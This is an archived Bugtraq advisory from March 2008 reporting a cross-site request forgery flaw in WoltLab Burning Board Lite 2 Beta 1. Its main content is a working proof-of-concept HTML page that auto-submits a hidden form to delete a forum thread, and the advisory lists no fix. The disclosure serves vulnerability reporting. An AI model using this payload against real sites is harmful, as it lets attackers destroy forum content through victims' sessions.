[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability
From: nbbn@xxxxxxx
Date: Sat, 8 Mar 2008 18:55:32 +0100

####################################################################
WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability
Vendor: woltlab.de
Version: Lite 2 Beta 1 (Released: March 6 2008)
Bug found by NBBN on March 8 2008
####################################################################


::Example
<html><head></head><body onLoad="javascript:document.attack.submit()">
<form action="http://site.tld/wbblite/index.php"; method="POST" name="attack">
<input type="hidden" name="action" value="ThreadDelete">
<input type="hidden" name="threadID" value="[ID of the thread]">
<input type="hidden" name="x" value="2">
<input type="hidden" name="y" value="8">
</form>
</body>
</html>

::Fix

No codefix

Prev by Date: [TKADV2008-001] Panda Internet Security/Antivirus+Firewall 2008 cpoint.sys Kernel Driver Memory Corruption Vulnerability
Next by Date: RE: [Full-disclosure] Firewire Attack on Windows Vista
Previous by thread: [TKADV2008-001] Panda Internet Security/Antivirus+Firewall 2008 cpoint.sys Kernel Driver Memory Corruption Vulnerability
Next by thread: [SECURITY] [DSA 1514-1] New moin packages fix several vulnerabilities
Index(es):
- Date
- Thread